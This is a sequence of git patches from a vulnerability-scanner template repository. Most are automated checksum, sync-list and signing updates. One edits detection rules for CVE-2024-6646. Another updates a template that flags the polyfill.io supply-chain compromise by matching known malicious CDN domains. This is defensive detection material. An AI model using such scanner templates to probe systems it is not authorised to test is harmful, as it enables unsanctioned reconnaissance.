-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:5193a4299dd58dfbddb6ef707335cb91d2269dcd +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:58237f477e03c725e443fa7cfdb177c12ff9460d +http/technologies/wordpress/plugins/webp-express.yaml:5d46350ca0fcf42fcfa13b2a8e808ddd5654bbc3 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:99aa09b086e97a6d3b40765807ef44c1e1df65a1 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d49271d2f86a17c0d8d55df30f3bfb8158304123 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:5d54b831c52fd527d9934dfdfa4450080df3a41a +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:1095f70a6bd7f8d2f97fe8e8976e9ace78382d2b http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:265d906e754e9fb52def5496d7efc0d3656f6941 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:b10981d9a855f3c3dcdc446a7ffab5335dbaa8a7 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:13787c6dcddcc0d3faa52b2725a6999ecb2ef65c +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:c26dbda9acf5a95641fff13ad118aa7bc7810038 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:f2b6138a1f3580ab969d5792e16ef632dc1f7831 +http/technologies/wordpress/plugins/woocommerce-services.yaml:fa747c5a80f0cf59e5e1c46d68d6e3b7cfe9e8e3 +http/technologies/wordpress/plugins/woocommerce.yaml:2478239bcec819f4335c5c05866cb3d4ca010547 +http/technologies/wordpress/plugins/wordfence.yaml:35a35c9bf106219ef4e30eb3bd8177c1b59f735c +http/technologies/wordpress/plugins/wordpress-importer.yaml:05034fcdd19ac923c5a3a8843738e3947a255cdb +http/technologies/wordpress/plugins/wordpress-seo.yaml:a0d6dcb927e78a5408044dbb7b8c73844d053469 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:576b13e5c91e36bff0fb0985919cea82989356cc +http/technologies/wordpress/plugins/wp-crontrol.yaml:811d6ee15d9b3bb5c8d977d7283b33b8e69d53f3 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:59eff1e48d9a4d9b344704ee0b0f4bbc7ebc81f3 +http/technologies/wordpress/plugins/wp-file-manager.yaml:9e70241da0a5e614dce1a9a14b545de5c631ecce +http/technologies/wordpress/plugins/wp-google-maps.yaml:f541a8d949ecda216f53fb9f8957b35a1e41668f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:007d7bd0852355040383561db6df2b424050711a +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d222accd75b8b3c3016b979d7ac5a65d19f23009 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:190d951898e1a1ae8ec96bce93adc069a52671ee +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:1ae9d9d5e49c49b0341bc20ab0d97b3b795afaa1 +http/technologies/wordpress/plugins/wp-optimize.yaml:6f3932fe3a55c6eddd51e21dc32c0dbe0ef9574c +http/technologies/wordpress/plugins/wp-pagenavi.yaml:fa900a40b3976d823eae8555cd935c819390212b +http/technologies/wordpress/plugins/wp-reset.yaml:56d6c73fd057820bb3707b9041414d61548c038b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f53a35f63e091b301c2c834f3a2218ead5262442 +http/technologies/wordpress/plugins/wp-rollback.yaml:ba77a2f4281c3f4ed923595189c14b16e7686891 +http/technologies/wordpress/plugins/wp-seopress.yaml:ec5bbd54bcd0d9bd1ef9cd0b0a5bae7d355c5b5c +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:65def275e8c6f0bde309e7bac8ed3d061d22c25d +http/technologies/wordpress/plugins/wp-smushit.yaml:7ac33bc2154f6240713ec1140de6dd3dbad59ded +http/technologies/wordpress/plugins/wp-statistics.yaml:e5b7b8f98f10b66238d6b39cef1ea9d2fb14b313 +http/technologies/wordpress/plugins/wp-super-cache.yaml:661060e33019702745efcb4f069915787b4877f9 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:436e37a21507a58d139a1432a47dadeee2d26a49 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:db3e7bd813ad6479d6fbb2a48234b33aa6acbf43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:3b3d22cef14074cde4e88d2fac9d8366ef1d60ba +http/technologies/wordpress/plugins/wps-hide-login.yaml:410e019670f52e5418c3f097a5fda164e4fd4d0f +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:5c6704cdebc3c91d5ff5924feb06b28b381e4ab6 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:91eaabb68a74c5e6452df63eb64dfcb7d3fb8cd1 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8888,7 +8889,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:56e17ebf679a9010efc0dc095d3324bbbbd8b8b2 +templates-checksum.txt:e0056d7437975cb0cff0598f6f62f7bfb71c7409 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b7d6e4e4b2472fc21bcb548213c77731d4cc8b92 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 05:52:07 +0000 Subject: [PATCH 1356/1841] Auto Generated New Template Addition List [Thu Jul 18 05:52:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bdba98d14f..21e16dbbd3 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml +http/exposed-panels/freshrss-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml From fa368a0bbacc719519328495a2a316d8828d6aeb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 05:52:33 +0000 Subject: [PATCH 1358/1841] Auto Generated Templates Checksum [Thu Jul 18 05:52:33 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3ead0ed661..4fdf3b6f36 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4068,6 +4068,7 @@ http/exposed-panels/fortinet/fortiweb-panel.yaml:b93efd955e84caf58e7b429c2c701e2 http/exposed-panels/fortinet/fortiwlm-panel.yaml:58b416a82445f61efa24e56404f9f348e1772a79 http/exposed-panels/freeipa-panel.yaml:f233b371c8a4347054a55fb38ea8b4f3d381dd98 http/exposed-panels/freepbx-administration-panel.yaml:4fadc7db65bd76305a551a50c7bc2a68a373f429 +http/exposed-panels/freshrss-panel.yaml:8b77963b0ae2aee9b86ec586e0b703e1c074ba00 http/exposed-panels/friendica-panel.yaml:29fc5876b779870b976a87cd70a46ff13944b4e7 http/exposed-panels/froxlor-management-panel.yaml:f10e7eae9a4162c559a720f3c390b9e36ac7ffb9 http/exposed-panels/ftm-manager-panel.yaml:bb2e43d32f3355c61c6cfa69b54e5c3ce7352137 @@ -5631,6 +5632,7 @@ http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb http/misconfiguration/imgproxy-unauth.yaml:17290c58c4487e0f2bb313179dcda02d62447789 http/misconfiguration/installer/activecollab-installer.yaml:842f496ce5d4b2c2dc3eed0109a75a5c2cd096a3 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 +http/misconfiguration/installer/adguard-installer.yaml:902662411f076dcd44d3c917f2b4c1b0f0e25aea http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 http/misconfiguration/installer/alma-installer.yaml:50fb01e501f60ce17284f44c30bf672eb6986d6a http/misconfiguration/installer/ampache-music-installer.yaml:e47cca91cb31625a8c216ae6a4a69bb6fc9e8cd0 @@ -8889,7 +8891,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e0056d7437975cb0cff0598f6f62f7bfb71c7409 +templates-checksum.txt:ec2442648eccf245ddb6265727c89c24c5300694 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 04090bd3d25f24ef016370da1d3f33032dffb855 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 05:52:39 +0000 Subject: [PATCH 1359/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b23226a66c..761334138b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,11 +17,13 @@ on: - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' + - 'http/exposed-panels/adguard-panel.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/exposures/files/adcs-certificate.yaml' + - 'http/misconfiguration/installer/adguard-installer.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' From 383d23a83fd1a667fb96b602d2a9aa0a49bd6596 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 05:52:55 +0000 Subject: [PATCH 1360/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 761334138b..a9ade4ce14 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -19,6 +19,7 @@ on: - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/exposed-panels/adguard-panel.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' + - 'http/exposed-panels/freshrss-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' From fec8878eb9513ccb1fefb1df0d7f847b29da709f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 05:53:30 +0000 Subject: [PATCH 1361/1841] Auto Template Signing [Thu Jul 18 05:53:30 UTC 2024] :robot: --- http/exposed-panels/adguard-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/adguard-panel.yaml b/http/exposed-panels/adguard-panel.yaml index 0f40d77b89..6f353815b0 100644 --- a/http/exposed-panels/adguard-panel.yaml +++ b/http/exposed-panels/adguard-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b09a107648d99ce5d007a905bf8600a2e70f88ba Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 11:32:02 +0530 Subject: [PATCH 1362/1841] minor-update --- http/cves/2024/CVE-2024-6646.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml index 19fb5ad9c9..88b61eb999 100644 --- a/http/cves/2024/CVE-2024-6646.yaml +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -37,6 +37,11 @@ http: - "system:staSettings" condition: and + - type: word + part: content_type + words: + - "application/force-download" + - type: status status: - 200 From 86e8d4b964544aeae2f9915ea545ccc96bb1ee02 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:05:00 +0000 Subject: [PATCH 1363/1841] Auto Generated New Template Addition List [Thu Jul 18 06:05:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 21e16dbbd3..3bfa3479ac 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/cves/2024/CVE-2024-6289.yaml +http/cves/2024/CVE-2024-6646.yaml http/exposed-panels/adguard-panel.yaml http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/freshrss-panel.yaml From cb2b299d0d00ea7097e088113cf7e5c4d5402743 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:05:15 +0000 Subject: [PATCH 1364/1841] Auto Generated Templates Checksum [Thu Jul 18 06:05:15 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4fdf3b6f36..49d8c47f05 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3509,6 +3509,7 @@ http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 +http/cves/2024/CVE-2024-6646.yaml:aaddeee9335f75d2153151dbe1ed7b609a504380 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -3721,7 +3722,7 @@ http/exposed-panels/activemq-panel.yaml:0675006d3342a2ddfee56254376feb15359099f7 http/exposed-panels/acunetix-login.yaml:bf512b02e3ce26629e30832a4e6cd11b01c0a517 http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:28a7f3d98134a544c4c8bce4153606da4ea7da78 -http/exposed-panels/adguard-panel.yaml:a4216d89dd47a14a4f77629cb54da8a9b59c65f9 +http/exposed-panels/adguard-panel.yaml:160c2b8130db7ef4dece190c6bbc7d4fcb610351 http/exposed-panels/adhoc-transfer-panel.yaml:d865eadf819552085319ebae3057f45afc659d24 http/exposed-panels/adiscon-loganalyzer.yaml:ad4702b4089560080d43afd9c1b6dd643ca7b9bb http/exposed-panels/adminer-panel-detect.yaml:411ab492b25f6a7fa2c56b7aae4deb3877903e72 @@ -8891,7 +8892,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ec2442648eccf245ddb6265727c89c24c5300694 +templates-checksum.txt:5074602f9197e25e64b289424058eedf85de979a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b874ae98ce912a7848a98118d3a404f65a853199 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:05:59 +0000 Subject: [PATCH 1365/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a9ade4ce14..ad5d6ba03c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' + - 'http/cves/2024/CVE-2024-6646.yaml' - 'http/exposed-panels/adguard-panel.yaml' - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/freshrss-panel.yaml' From 6e1c02b0a4a3c7ba05b23a9e9ebcf711f92af205 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:06:57 +0000 Subject: [PATCH 1366/1841] Auto Template Signing [Thu Jul 18 06:06:57 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6646.yaml | 1 + http/exposed-panels/freshrss-panel.yaml | 1 + http/misconfiguration/installer/adguard-installer.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml index 88b61eb999..6cafdab5f1 100644 --- a/http/cves/2024/CVE-2024-6646.yaml +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -45,3 +45,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022061dfd0175001443072f737684368faff9a2516c4009eff8165c3b03ce91ebc40022071c9cea2bee7a01701b51c5a707e033d359a8c8740a9340a62ac452c709bff82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/freshrss-panel.yaml b/http/exposed-panels/freshrss-panel.yaml index b9cebb4ebd..5b0170193c 100644 --- a/http/exposed-panels/freshrss-panel.yaml +++ b/http/exposed-panels/freshrss-panel.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/adguard-installer.yaml b/http/misconfiguration/installer/adguard-installer.yaml index 4e7e242d24..5766ac0c07 100644 --- a/http/misconfiguration/installer/adguard-installer.yaml +++ b/http/misconfiguration/installer/adguard-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bb2cb430c07999d066b924cce317fc4e0fc7c0f4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 11:38:58 +0530 Subject: [PATCH 1367/1841] minor-update --- headless/2024/CVE-2024-38526.yaml | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/headless/2024/CVE-2024-38526.yaml b/headless/2024/CVE-2024-38526.yaml index 445d1debf4..53ebf0d9b0 100644 --- a/headless/2024/CVE-2024-38526.yaml +++ b/headless/2024/CVE-2024-38526.yaml @@ -1,21 +1,28 @@ id: CVE-2024-38526 info: - name: CVE-2024-38526 - Untrusted 3rd party + name: Polyfill Supply Chain Attack Malicious Code Execution author: abut0n severity: high description: | - The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io. However, in February of 2024, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io + pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io impact: | - The new Chinese owner of the popular Polyfill JS project injects malware into more than 100 thousand sites. + The polyfill.io CDN has been sold and now serves malicious code. remediation: | - Remove the dependecy. + This issue has been fixed in pdoc 14.5.1. reference: - https://sansec.io/research/polyfill-supply-chain-attack - https://nvd.nist.gov/vuln/detail/CVE-2024-38526 - https://x.com/triblondon/status/1761852117579427975 - tags: CVE,CVE-2024-38526,headless,supply-chain - + - https://github.com/mitmproxy/pdoc/pull/703 + - https://github.com/mitmproxy/pdoc/security/advisories/GHSA-5vgj-ggm4-fg62 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L + cvss-score: 7.2 + cve-id: CVE-2024-38526 + epss-score: 0.00045 + epss-percentile: 0.16001 + tags: cve,cve2024,supply-chain,polyfill headless: - steps: - args: @@ -44,7 +51,6 @@ headless: - type: word words: - "polyfill.io" - # More domains that have been used by the same actor to spread malware since at least June 2023: bootcdn.net, bootcss.com, staticfile.net, staticfile.org, unionadjs.com, xhsbpza.com, union.macoms.la, newcrbpc.com. - "bootcdn.net" - "bootcss.com" - "staticfile.net" From fac0a0ba19e8921f60ed7fe823434696042f4315 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:09:54 +0000 Subject: [PATCH 1368/1841] Auto Generated New Template Addition List [Thu Jul 18 06:09:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3bfa3479ac..2c9075791d 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml +http/cves/2024/CVE-2024-34257.yaml http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4257.yaml From cca12ff31d7a3b2359458be407501d505110ea7b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:10:02 +0000 Subject: [PATCH 1369/1841] Auto Generated Templates Checksum [Thu Jul 18 06:10:02 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49d8c47f05..b4b586236c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3474,6 +3474,7 @@ http/cves/2024/CVE-2024-33610.yaml:24618eb8295fd20c2eaafe525e895edb63a1c04c http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b +http/cves/2024/CVE-2024-34257.yaml:9019e4541ac061628afcfa02b0304295ec1935a4 http/cves/2024/CVE-2024-34351.yaml:0b871adb6b9e887987000e89999f1de41647ddcb http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 @@ -3509,7 +3510,7 @@ http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/cves/2024/CVE-2024-6188.yaml:dc4f78116668d20ee580f223cdf67a19cd0c6f26 http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 -http/cves/2024/CVE-2024-6646.yaml:aaddeee9335f75d2153151dbe1ed7b609a504380 +http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce 